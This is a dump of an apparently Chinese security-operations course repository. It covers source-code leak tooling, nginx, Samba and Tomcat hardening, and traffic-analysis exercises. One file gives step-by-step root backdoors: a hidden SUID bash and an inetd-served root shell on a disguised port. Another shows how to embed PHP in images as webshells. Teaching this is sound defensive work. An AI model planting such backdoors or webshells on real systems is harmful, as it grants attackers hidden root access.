│ │ ├── nessie_icon_tiamat_white.png
│ │ ├── o%3fp=http%3A%2F%2Fwww.earsurgery.org%2F&r=http%3A%2F%2Fwww.google.at%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCQQFjAA%26url%3Dhttp%253.bGQ&pid=2864&__js__=true
│ │ ├── o.js
│ │ ├── object4939.text%2fhtml
│ │ ├── object4988.text%2fhtml
│ │ ├── object4998.text%2fhtml
│ │ ├── osd.js
│ │ ├── overlay.png
│ │ ├── page-list.css%3fver=4.2
│ │ ├── pageview.gif%3freferrer=http%3A%2F%2Fwww.google.at%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCQQFjAA%26url%3Dhttp%253A%252F%252Fwww.earsurgery.org%252F%26ei%.bGQ
│ │ ├── pixel%3fgoogle_hm=RrNUvHvjEeSDswAlkDXdQrxBTN0=&google_nid=chango&google_sc=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1
│ │ ├── pixel%3fgoogle_hm=RrNUvHvjEeSDswAlkDXdQrxBTN0=&google_nid=chango&google_sc=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1&google_tc=
│ │ ├── pixel%3fgoogle_nid=owneriq1&google_cm&google_sc&google_ula=1174&google_hm=UTQ3MTAwNDA4MDE1OTE3MjU3OTA=&esi=1&pt=sholic
│ │ ├── pixel%3fgoogle_nid=owneriq1&google_cm=&google_sc=&google_ula=1174&google_hm=UTQ3MTAwNDA4MDE1OTE3MjU3OTA=&esi=1&pt=sholic&google_tc=
│ │ ├── pxj%3fbidder=13&seg=703107&action=su('Q4710040801591725790');as(3727514514);as(3585802694);as(3588953253);
│ │ ├── relator%3fid=&partner=adxhm&token=46b354bc-7be3-11e4-83b3-00259035dd42&uid=1&google_error=3
│ │ ├── rum%3fcm_dsp_id=30&expiration=1417760880&external_user_id=46b354bc-7be3-11e4-83b3-00259035dd42
│ │ ├── s%3fv=r20120211
│ │ ├── s%3fv=r20120211(1)
│ │ ├── sd%3fcc=1&id=537072962&val=46b354bc-7be3-11e4-83b3-00259035dd42
│ │ ├── setuid%3fcode=46b354bc-7be3-11e4-83b3-00259035dd42&entity=62
│ │ ├── share_buttons.css
│ │ ├── shareaholic.js
│ │ ├── shareaholic_tools.js
│ │ ├── sholic.js
│ │ ├── show_ads_impl.js
│ │ ├── skip-link-focus-fix.js%3fver=20130115
│ │ ├── style.css%3fver=4.0
│ │ ├── suboptions.css
│ │ ├── tYJ9qCJyuXGuIc0n7tv1_SGXCxH__PG6BPqcKqZT2JA.js
│ │ ├── tap.php%3fexpires=30&nid=2245&put=46b354bc-7be3-11e4-83b3-00259035dd42&v=7727
│ │ ├── url%3fsa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.earsurgery.org%2F&ei=e6eAVJGoBJbjaqm9gWg&usg=AFQjCNESqoW9ENBFsvEzZQIyl-s5KA1Rag&bvm=bv.80642063,d.bGQ
│ │ ├── vslider.js%3fver=4.0
│ │ ├── xPF_HAXN7TK9bMAgBjZDwQzO1-Wf5GvrN5_lIReIhbrhqHAlWyTDbaOBMPWitjnX
│ │ ├── x_button_blue2.png
│ │ └── zrt_lookup.html
│ ├── pic
│ │ ├── 2019-07-16-18-04-58.png
│ │ ├── 2019-07-18-09-29-15.png
│ │ ├── 2019-07-18-09-30-32.png
│ │ ├── 2019-07-18-10-17-05.png
│ │ ├── 2019-07-18-10-44-11.png
│ │ ├── 2019-07-18-16-33-19.png
│ │ ├── 2019-07-18-16-34-07.png
│ │ ├── 2019-07-18-16-36-54.png
│ │ ├── 2019-07-18-18-16-44.png
│ │ └── 2019-07-18-18-19-37.png
│ ├── writeup.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── bak
│ │ ├── .DS_Store
│ │ └── 2014-12-04-traffic-analysis-exercise.pcap.zip
│ │ ├── traffic-analysis-exercise.pcap
│ │ └── 题目说明.md
├── 4
│ ├── .DS_Store
│ ├── 2014-12-08-traffic-analysis-exercise-answers.pdf
│ ├── writeup.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── 2014-12-08-traffic-analysis-exercise.pcap
│ │ ├── bak
│ │ ├── .DS_Store
│ │ └── 2014-12-08-traffic-analysis-exercise.pcap.zip
│ │ └── 题目描述.md
├── .DS_Store
└── README.md
└── 防火墙:IDS:IPS
└── 防火墙.md
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | .vs
3 | .git
4 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 本课程为开源课程,仅供学习,不要做商业使用。
2 |
3 | ```
4 | ├── README.md
5 | ├── 防火墙:IDS:IPS
6 | │ └── 防火墙.md
7 | ├── 数据泄露
8 | │ └── 文件泄露.md
9 | ├── 服务加固
10 | │ ├── apache加固.md
11 | │ ├── mysql加固.md
12 | │ ├── nginx加固.md
13 | │ ├── samba加固.md
14 | │ ├── ssh安全配置.md
15 | │ ├── tomcat加固.md
16 | │ └── 解析漏洞总结.txt
17 | ├── 流量分析
18 | │ ├── 1
19 | │ │ ├── 1.traffic-analysis-exercise-answers.pdf
20 | │ │ ├── page
21 | │ │ ├── pic
22 | │ │ ├── writeup_level1.md
23 | │ │ ├── writeup_level2.md
24 | │ │ ├── writeup_level3.md
25 | │ │ └── 题目内容
26 | │ ├── 2
27 | │ │ ├── 2.traffic-analysis-exercise-answers.pdf
28 | │ │ ├── page
29 | │ │ ├── pic
30 | │ │ ├── writeup.md
31 | │ │ └── 题目内容
32 | │ ├── 3
33 | │ │ ├── 3.traffic-analysis-exercise-answers.pdf
34 | │ │ ├── file
35 | │ │ ├── hex_xor.py
36 | │ │ ├── page
37 | │ │ ├── pic
38 | │ │ ├── writeup.md
39 | │ │ └── 题目内容
40 | │ ├── 4
41 | │ │ ├── 2014-12-08-traffic-analysis-exercise-answers.pdf
42 | │ │ ├── pic
43 | │ │ ├── writeup.md
44 | │ │ └── 题目内容
45 | │ └── README.md
46 | └── 木马病毒治理
47 | └── 克制不死马.txt
48 | ```
49 |
--------------------------------------------------------------------------------
/数据泄露/文件泄露.md:
--------------------------------------------------------------------------------
1 | **.hg源码泄漏**
2 | 漏洞成因:
3 |
4 | hg init的时候会生成.hg
5 |
6 | `http://www.example.com/.hg/`
7 |
8 | 漏洞利用:
9 |
10 | >工具:dvcs-ripper
11 |
12 | `rip-hg.pl -v -u http://www.example.com/.hg/`
13 |
14 | **.git源码泄漏**
15 |
16 | 漏洞成因:
17 |
18 | 在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。
19 |
20 | `http://www.example.com/.git/config`
21 |
22 | 漏洞利用:
23 |
24 | >工具:GitHack
25 |
26 | `GitHack.py http://www.example.com/.git/`
27 |
28 | >工具:dvcs-ripper
29 |
30 | `rip-git.pl -v -u http://www.example.com/.git/`
31 |
32 | **.DS_Store文件泄漏**
33 |
34 | 漏洞成因:
35 |
36 | 在发布代码时未删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息。
37 |
38 | 漏洞利用:
39 |
40 | `http://www.example.com/.ds_store`
41 |
42 | 注意路径检查
43 |
44 | >工具:dsstoreexp
45 |
46 | `python ds_store_exp.py http://www.example.com/.DS_Store`
47 |
48 | **网站备份压缩文件**
49 |
50 | 在网站的使用过程中,往往需要对网站中的文件进行修改、升级。此时就需要对网站整站或者其中某一页面进行备份。当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站web目录下,而该目录又没有设置访问权限时,便有可能导致备份文件或者编辑器的缓存文件被下载,导致敏感信息泄露,给服务器的安全埋下隐患。
51 |
52 | 漏洞成因及危害:
53 |
54 | 该漏洞的成因主要有以下两种:
55 |
56 | 服务器管理员错误地将网站或者网页的备份文件放置到服务器web目录下。
57 | 编辑器在使用过程中自动保存的备份文件或者临时文件因为各种原因没有被删除而保存在web目录下。
58 |
59 | 漏洞检测:
60 |
61 | 该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载,利用。源代码中所包含的各类敏感信息,如服务器数据库连接信息,服务器配置信息等会因此而泄露,造成巨大的损失。被泄露的源代码还可能会被用于代码审计,进一步利用而对整个系统的安全埋下隐患。
62 | ```
63 | .rar
64 | .zip
65 | .7z
66 | .tar.gz
67 | .bak
68 | .swp
69 | .txt
70 | .html
71 | ```
72 |
73 | **SVN导致文件泄露**
74 |
75 | Subversion,简称SVN,是一个开放源代码的版本控制系统,相对于的RCS、CVS,采用了分支管理系统,它的设计目标就是取代CVS。互联网上越来越多的控制服务从CVS转移到Subversion。
76 |
77 | Subversion使用服务端—客户端的结构,当然服务端与客户端可以都运行在同一台服务器上。在服务端是存放着所有受控制数据的Subversion仓库,另一端是Subversion的客户端程序,管理着受控数据的一部分在本地的映射(称为“工作副本”)。在这两端之间,是通过各种仓库存取层(Repository Access,简称RA)的多条通道进行访问的。这些通道中,可以通过不同的网络协议,例如HTTP、SSH等,或本地文件的方式来对仓库进行操作。
78 |
79 | `http://vote.lz.taobao.com/admin/scripts/fckeditor.266/editor/.svn/entries`
80 |
81 | 漏洞利用:
82 |
83 | >工具:dvcs-ripper
84 |
85 | `rip-svn.pl -v -u http://www.example.com/.svn/`
86 |
87 | **WEB-INF/web.xml泄露**
88 |
89 | WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。
90 |
91 | WEB-INF主要包含一下文件或目录:
92 |
93 | `/WEB-INF/web.xml`:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
94 | `/WEB-INF/classes/`:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
95 | `/WEB-INF/lib/`:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
96 | `/WEB-INF/src/`:源码目录,按照包名结构放置各个java文件。
97 | `/WEB-INF/database.properties`:数据库配置文件
98 |
99 | 漏洞成因:
100 |
101 | 通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。
102 |
103 | 漏洞检测以及利用方法:
104 |
105 | 通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。
106 | 一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!
107 |
108 | **CVS泄漏**
109 |
110 | 漏洞利用
111 |
112 | 测试的目录
113 |
114 | ```
115 | http://url/CVS/Root 返回根信息
116 | http://url/CVS/Entries 返回所有文件的结构
117 | ```
118 | 取回源码的命令
119 | ```
120 | bk clone http://url/name dir
121 | ```
122 | 这个命令的意思就是把远端一个名为name的repo clone到本地名为dir的目录下。
123 |
124 | 查看所有的改变的命令,转到download的目录
125 | ```
126 | bk changes
127 | ```
--------------------------------------------------------------------------------
/服务加固/nginx加固.md:
--------------------------------------------------------------------------------
1 | ## 1. 在Nginx中禁用server_tokens指令
2 |
3 | 该server_tokens指令告诉nginx的错误页面显示其当前版本。 这是不可取的,因为您不想与世界共享这些信息,以防止在您的Web服务器由特定版本中的已知漏洞造成的攻击。
4 |
5 | 要禁用server_tokens指令,设定在关闭服务器块内:
6 | ```
7 | server {
8 | listen 192.168.0.25:80;
9 | Server_tokens off;
10 | server_name howtoinglovesnginx.com www.howtoinglovesnginx.com;
11 | access_log /var/www/logs/howtoinglovesnginx.access.log;
12 | error_log /var/www/logs/howtoinglovesnginx.error.log error;
13 | root /var/www/howtoinglovesnginx.com/public_html;
14 | index index.html index.htm;
15 | }
16 | ```
17 |
18 | ## 2. 在Nginx中禁用不需要的HTTP方法
19 |
20 | 对于一般的网站和应用程序,你应该只允许GET,POST,和HEAD并禁用所有其他人。
21 |
22 | 为此,将以下行代码放在服务器块中。 444 HTTP响应指空响应,并经常在Nginx的用来愚弄恶意软件攻击:
23 | ```
24 | if ($request_method !~ ^(GET|HEAD|POST)$) {
25 | return 444;
26 | }
27 | ```
28 |
29 | ## 3. 在Nginx中设置缓冲区大小限制
30 | 为了防止对您的Nginx Web服务器的缓冲区溢出攻击,坐落在一个单独的文件以下指令(创建的文件名为/etc/nginx/conf.d/buffer.conf为例):
31 |
32 | ```
33 | client_body_buffer_size 1k;
34 | client_header_buffer_size 1k;
35 | client_max_body_size 1k;
36 | large_client_header_buffers 2 1k;
37 | ```
38 |
39 | 上面的指令将确保对您的Web服务器的请求不会导致系统中的缓冲区溢出。
40 |
41 | 然后在配置文件中添加一个include指令:
42 | ```
43 | include /etc/nginx/conf.d/*.conf;
44 | ```
45 |
46 | ## 4. 日志设置
47 | 查看nginx.conf配置文件中,error_log、access_log前的“#”是否去掉
48 |
49 | 将error_log前的“#”去掉,记录错误日志
50 | 将access_log前的“#”去掉,记录访问日志
51 | 设置access_log,修改配置文件如下:
52 | ```
53 | log_format nsfocus '$remote_addr - $remote_user [$time_local] '
54 | ' "$request" $status $body_bytes_sent "$http_referer" '
55 | ' "$http_user_agent" "$http_x_forwarded_for"'; access_log logs/access.log nsfocus;
56 | ```
57 | nsfocus是设置配置文件格式的名称
58 |
59 | ## 5. 自定义错误信息
60 |
61 | 修改src/http/ngx_http_special_response.c,自己定制错误信息
62 | ```
63 | ## messages with just a carriage return.
64 | static char ngx_http_error_400_page[] = CRLF;
65 | static char ngx_http_error_404_page[] = CRLF;
66 | static char ngx_http_error_413_page[] = CRLF;
67 | static char ngx_http_error_502_page[] = CRLF;
68 | static char ngx_http_error_504_page[] = CRLF;
69 | ```
70 | 常见错误:
71 | ```
72 | 400 bad request
73 | 404 NOT FOUND
74 | 413 Request Entity Too Large
75 | 502 Bad Gateway
76 | 504 Gateway Time-out
77 | ```
78 |
79 | ## 6. 手动安装补丁或安装最新版本软件
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-47-11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-47-11.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-48-30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-48-30.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-49-44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-49-44.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-49-58.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-49-58.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-13.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-22.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-50-45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-50-45.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-01-51-03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-01-51-03.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-02-59-43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-02-59-43.png
--------------------------------------------------------------------------------
/服务加固/pic/2019-07-30-03-00-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/2019-07-30-03-00-13.png
--------------------------------------------------------------------------------
/服务加固/pic/FTP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/FTP.png
--------------------------------------------------------------------------------
/服务加固/pic/ac.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ac.png
--------------------------------------------------------------------------------
/服务加固/pic/app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/app.png
--------------------------------------------------------------------------------
/服务加固/pic/ca1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ca1.png
--------------------------------------------------------------------------------
/服务加固/pic/dc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/dc.png
--------------------------------------------------------------------------------
/服务加固/pic/ip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/ip.png
--------------------------------------------------------------------------------
/服务加固/pic/log.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/log.png
--------------------------------------------------------------------------------
/服务加固/pic/pw.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/pw.png
--------------------------------------------------------------------------------
/服务加固/pic/sg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/pic/sg.png
--------------------------------------------------------------------------------
/服务加固/samba加固.md:
--------------------------------------------------------------------------------
1 | Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布的4.6.4版本修复了一个严重的远程代码执行漏洞。漏洞编号为CVE-2017-7494,影响Samba 3.5.0 之后及4.6.4/4.5.10/4.4.14版本。
2 |
3 | 1. 使用源码安装的Samba用户,请尽快下载最新的Samba版本手动更新;
4 |
5 | 2. 使用二进制分发包(RPM等方式)的用户立即进行yum,apt-get update等安全更新操作;
6 |
7 | 缓解策略:用户可以通过在smb.conf的[global]节点下增加 “nt pipe support = no” 选项,然后重新启动Samba服务, 以此达到缓解该漏洞的效果。
--------------------------------------------------------------------------------
/服务加固/tomcat加固.md:
--------------------------------------------------------------------------------
1 | Tomcat服务默认启用了管理后台功能,使用该后台可直接上传 war 文件包对站点进行部署和管理。由于运维人员的疏忽,可能导致管理后台存在空口令或者弱口令的漏洞,使得黑客或者不法分子可以利用该漏洞直接上传 Webshell 脚本导致服务器沦陷。
2 |
3 | 通常 Tomcat 后台管理的 URL 地址为 http://iP:8080/manager/html/
4 |
5 | 黑客通过猜解到的口令登录 Tomcat 管理后台后,可以上传 Webshell 脚本导致服务器被入侵。
6 |
7 | CVE-2017-12617影响范围:Apache Tomcat 7.0.0 – 7.0.81
8 |
9 | CVE-2017-12616影响范围:Apache Tomcat 7.0.0 – 7.0.80
10 |
11 | CVE-2017-12615影响范围: Apache Tomcat 7.0.0 – 7.0.79
12 |
13 | ## 安全加固方案
14 | 由于此类型漏洞可能对业务系统造成比较严重的危害,建议您针对 Tomcat 管理后台进行以下安全加固配置。
15 |
16 | 1. 网络访问控制
17 | 如果业务不需要使用 Tomcat 管理后台管理业务代码,我们可以使用安全组防火墙功能对管理后台 URL 地址进行拦截,或直接将 Tomcat 部署目录中 webapps 文件夹中的 manager、host-manager 文件夹全部删除,并注释 Tomcat 目录中 conf 文件夹中的 tomcat-users.xml 文件中的所有代码。
18 |
19 | 如果业务系统确实需要使用 Tomcat 管理后台进行业务代码的发布和管理,建议为 Tomcat 管理后台配置强口令,并修改默认 admin 用户,且密码长度不低于10位,必须包含大写字母、特殊符号、数字组合。
20 |
21 | 2. 开启 Tomcat 的访问日志
22 | 修改 conf/server.xml 文件,将下列代码取消注释:
23 | ```
24 |
26 | ```
27 |
28 | 启用访问日志功能,重启 Tomcat 服务后,在 tomcat_home/logs 文件夹中就可以看到访问日志。
29 |
30 | 3. Tomcat 默认帐号安全
31 | 修改 Tomcat 安装目录 conf 下的 tomcat-user.xml 文件,重新设置复杂口令并保存文件。重启 Tomcat 服务后,新口令即生效。
32 |
33 | 4. 修改默认访问端口
34 | 修改 conf/server.xml 文件把默认的 8080 访问端口改成其它端口。
35 |
36 | 5. 重定向错误页面
37 | 修改访问 Tomcat 错误页面的返回信息,在 webapps\manger 目录中创建相应的401.html、404.htm、500.htm 文件,然后在 conf/web.xml 文件的最后一行之前添加下列代码:
38 |
39 | ```
40 |
41 | 401
42 | /401.htm
43 |
44 |
45 | 404
46 | /404.htm
47 |
48 |
49 | 500
50 | /500.htm
51 |
52 | ```
53 | 6. 禁止列出目录
54 | 防止直接访问目录时由于找不到默认页面,而列出目录下的文件的情况。
55 |
56 | 在 web.xml 文件中,将`listings`改成`false`。
57 |
58 | 7. 删除文档和示例程序
59 | 删除 webapps 目录下的 `docs`、`examples`、`manager`、`ROOT`、`host-manager` 文件夹。
60 |
61 | 8. 升级到最新稳定版本
--------------------------------------------------------------------------------
/服务加固/解析漏洞总结.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/服务加固/解析漏洞总结.txt
--------------------------------------------------------------------------------
/木马病毒治理/example/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/木马病毒治理/example/1.png
--------------------------------------------------------------------------------
/木马病毒治理/example/1的副本.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/木马病毒治理/example/1的副本.png
--------------------------------------------------------------------------------
/木马病毒治理/pic/2019-07-24-16-32-25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/木马病毒治理/pic/2019-07-24-16-32-25.png
--------------------------------------------------------------------------------
/木马病毒治理/suid shell和inetd后门.md:
--------------------------------------------------------------------------------
1 | 你现在已经是root用户, 想留一个后门
2 |
3 | ## suid shell
4 |
5 | 首先, 先切换成为root用户,并执行以下的命令:
6 | ```
7 | dawg:~# cp /bin/bash /.woot
8 | dawg:~# chmod 4755 /.woot
9 | dawg:~# ls -al
10 | /.woot-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot
11 | ```
12 | 当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) .
13 |
14 | 现在,做为一个普通用户,我们来启用这个后门:
15 |
16 | ```
17 | fw@dawg:~$ iduid=1000(fw) gid=1000(fw) groups=1000(fw)
18 | fw@dawg:~$ /.woot.woot-2.05b$ iduid=1000(fw) gid=1000(fw) groups=1000(fw).woot-2.05b$
19 | ```
20 | 为什么不行呢?
21 | 因为 bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:
22 |
23 | ```
24 | .woot-2.05b$ /.woot -p
25 | .woot-2.05b# id
26 | uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)
27 | ```
28 | 使用-p参数来获取一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,可以戳这里)
29 | 这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径。
30 | 小知识:
31 | 如何查找那些具有SUID 的文件:
32 |
33 | `dawg:~# find / -perm +4000 -ls`
34 |
35 | 这时就会返回具有SUID位的文件啦
36 |
37 | ## 远程后门:利用inetd.conf
38 |
39 | 我们使用vi来修改 /etc/inetd.conf 文件
40 | 原文件:
41 | ```
42 | #chargen dgram udp wait root internal
43 | #discard stream tcp nowait root internal
44 | #discard dgram udp wait root internal
45 | #daytime stream tcp nowait root internal
46 | ```
47 | 修改为:
48 | ```
49 | #discard stream tcp nowait root internal
50 | #discard dgram udp wait root internal
51 | daytime stream tcp nowait root /bin/bash bash -i
52 | ```
53 | 开启inetd:
54 | ```
55 | dawg:~# inetd
56 | ```
57 | 如果要强制重启inetd:
58 | ```
59 | dawg:~# ps -ef | grep inetd
60 | root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetdroot 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
61 | dawg:~# kill -HUP 362
62 | ```
63 |
64 | 现在我们就可以用nc来爆菊了:
65 | ```
66 | C:tools 192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA(UNKNOWN) [192.168.1.77] 13 (daytime) openbash: no job control in this shellbash-2.05b
67 | # bash-2.05b
68 | #bash-2.05b
69 | # id
70 | uid=0(root) gid=0(root) groups=0(root)bash-2.05b
71 | # uname -a
72 | Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux
73 | ```
74 | 小贴士:
75 | 我们可以修改`/etc/services`文件,加入以下的东西:
76 | `woot 6666/tcp #evil backdoor service`
77 | 然后修改`/etc/inetd.conf` :
78 | `woot stream tcp nowait root /bin/bash bash -i`
79 | 我们可以修改成一些常见的端口,以实现隐藏。
80 |
81 |
--------------------------------------------------------------------------------
/木马病毒治理/克制不死马.md:
--------------------------------------------------------------------------------
1 | 1.ps auxww|grep shell.php 找到pid后杀掉进程就可以,你删掉脚本是起不了作用的,因为php执行的时候已经把脚本读进去解释成opcode运行了
2 |
3 | 2.重启php等web服务
4 |
5 | 3.用一个ignore_user_abort(true)脚本,一直竞争写入(断断续续)。usleep要低于对方不死马设置的值。
6 |
7 | 4.创建一个和不死马生成的马一样名字的文件夹。
--------------------------------------------------------------------------------
/木马病毒治理/生成图片马.md:
--------------------------------------------------------------------------------
1 | ## 系统命令
2 |
3 | ### windows
4 | ```
5 | copy 1.jpg/b+1.php 2.jpg
6 | ```
7 | 参数`/b`:指定以二进制格式复制、合并文件;用于图像和音频文件等
8 |
9 | ### linux、macOS
10 |
11 | ```
12 | cat 1.php >> 1.jpg
13 | ```
14 | 将1.txt追加到1.jpg
15 |
16 | ## 工具
17 |
18 | 可以使用`010editor`等工具直接编辑,一般可以放在最末尾,不影响图片正常加载。
19 |
20 | 
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/流量分析/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/.DS_Store
--------------------------------------------------------------------------------
/流量分析/1/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/.DS_Store
--------------------------------------------------------------------------------
/流量分析/1/1.traffic-analysis-exercise-answers.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/1.traffic-analysis-exercise-answers.pdf
--------------------------------------------------------------------------------
/流量分析/1/page/%2f(1):
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | file not found
6 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 | 
21 |
22 |
23 |
24 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/流量分析/1/page/%2f(2):
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | file not found
6 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/流量分析/1/page/GLinkPing.aspx%3fIG=aee5908ea2d64991aa8b8996fd170a75&&ID=SERP,5091.1:
--------------------------------------------------------------------------------
